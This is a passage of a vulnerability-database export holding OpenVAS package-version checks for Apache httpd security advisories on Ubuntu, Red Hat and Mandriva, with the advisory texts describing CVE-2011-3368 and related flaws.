module in Apache did not properly\n interact with the RewriteRule and ProxyPassMatch pattern matches\n in the configuration of a reverse proxy. This could allow remote\n attackers to contact internal webservers behind the proxy that were\n not intended for external exposure. (CVE-2011-3368)\n\n Stefano Nichele discovered that the mod_proxy_ajp module in Apache when\n used with mod_proxy_balancer in certain configurations could allow\n remote attackers to cause a denial of service via a malformed HTTP\n request. (CVE-2011-3348)\n\n Samuel Montosa discovered that the ITK Multi-Processing Module for\n Apache did not properly handle certain configuration sections that\n specify NiceValue but not AssignUserID, preventing Apache from dropping\n privileges correctly. This issue only affected Ubuntu 10.04 LTS, Ubuntu\n 10.10 and Ubuntu 11.04. (CVE-2011-1176)\n\n USN 1199-1 fixed a vulnerability in the byterange filter of Apache. The\n upstream patch introduced a regression in Apache when handling specific\n byte range requests. This update fixes the issue.\n\n Original advisory details:\n\n A flaw was discovered in the byterange filter in Apache. A remote attacker\n could exploit this to cause a denial of service via resource exhaustion.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.16-1ubuntu3.4\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.16-1ubuntu3.4\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.14-5ubuntu8.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.14-5ubuntu8.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.17-1ubuntu1.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.17-1ubuntu1.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.8-1ubuntu0.22\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2011:1391-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192", "CVE-2011-3348"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310870617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870617", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2011:1391-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00015.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870617\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:34:25 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"RHSA\", value:\"2011:1391-01\");\n script_name(\"RedHat Update for httpd RHSA-2011:1391-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n It was discovered that mod_proxy_ajp incorrectly returned an 'Internal\n Server Error' response when processing certain malformed HTTP requests,\n which caused the back-end server to be marked as failed in configurations\n where mod_proxy was used in load balancer mode. A remote attacker could\n cause mod_proxy to not send requests to back-end AJP (Apache JServ\n Protocol) servers for the retry timeout period or until all back-end\n servers were marked as failed. (CVE-2011-3348)\n\n Red Hat would like to thank Context Information Security for reporting the\n CVE-2011-3368 issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736592)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-12-04T11:27:28", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1259-1", "cvss3": {}, "published": "2011-11-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for apache2 USN-1259-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-1176", "CVE-2011-3348"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840798", "href": "http://plugins.openvas.org/nasl.php?oid=840798", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1259_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for apache2 USN-1259-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the mod_proxy module in Apache did not properly\n interact with the RewriteRule and ProxyPassMatch pattern matches\n in the configuration of a reverse proxy. This could allow remote\n attackers to contact internal webservers behind the proxy that were\n not intended for external exposure. (CVE-2011-3368)\n\n Stefano Nichele discovered that the mod_proxy_ajp module in Apache when\n used with mod_proxy_balancer in certain configurations could allow\n remote attackers to cause a denial of service via a malformed HTTP\n request. (CVE-2011-3348)\n\n Samuel Montosa discovered that the ITK Multi-Processing Module for\n Apache did not properly handle certain configuration sections that\n specify NiceValue but not AssignUserID, preventing Apache from dropping\n privileges correctly. This issue only affected Ubuntu 10.04 LTS, Ubuntu\n 10.10 and Ubuntu 11.04. (CVE-2011-1176)\n\n USN 1199-1 fixed a vulnerability in the byterange filter of Apache. The\n upstream patch introduced a regression in Apache when handling specific\n byte range requests. This update fixes the issue.\n\n Original advisory details:\n\n A flaw was discovered in the byterange filter in Apache. A remote attacker\n could exploit this to cause a denial of service via resource exhaustion.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1259-1\";\ntag_affected = \"apache2 on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1259-1/\");\n script_id(840798);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:55:23 +0530 (Fri, 11 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"USN\", value: \"1259-1\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3348\", \"CVE-2011-1176\");\n script_name(\"Ubuntu Update for apache2 USN-1259-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.16-1ubuntu3.4\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.16-1ubuntu3.4\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.14-5ubuntu8.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.14-5ubuntu8.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.17-1ubuntu1.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.17-1ubuntu1.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.8-1ubuntu0.22\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:49", "description": "Check for the Version of apache", "cvss3": {}, "published": "2012-01-13T00:00:00", "type": "openvas", "title": "Mandriva Update for apache MDVSA-2012:003 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2011-3368"], "modified": "2018-01-02T00:00:00", "id": "OPENVAS:831523", "href": "http://plugins.openvas.org/nasl.php?oid=831523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2012:003 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in apache:\n Integer overflow in the ap_pregsub function in server/util.c in the\n Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21,\n when the mod_setenvif module is enabled, allows local users to gain\n privileges via a .htaccess file with a crafted SetEnvIf directive,\n in conjunction with a crafted HTTP request header, leading to a\n heap-based buffer overflow (CVE-2011-3607).\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision\n 1179239 patch is in place, does not properly interact with use of (1)\n RewriteRule and (2) ProxyPassMatch pattern matches for configuration\n of a reverse proxy, which allows remote attackers to send requests\n to intranet servers via a malformed URI containing an \\@ (at sign)\n character and a : (colon) character in invalid positions. NOTE: this\n vulnerability exists because of an incomplete fix for CVE-2011-3368\n (CVE-2011-4317).\n\n The updated packages have been patched to correct these issues.\";\n\ntag_affected = \"apache on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:003\");\n script_id(831523);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-13 10:49:33 +0530 (Fri, 13 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"MDVSA\", value: \"2012:003\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3368\", \"CVE-2011-4317\");\n script_name(\"Mandriva Update for apache MDVSA-2012:003 (apache)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) 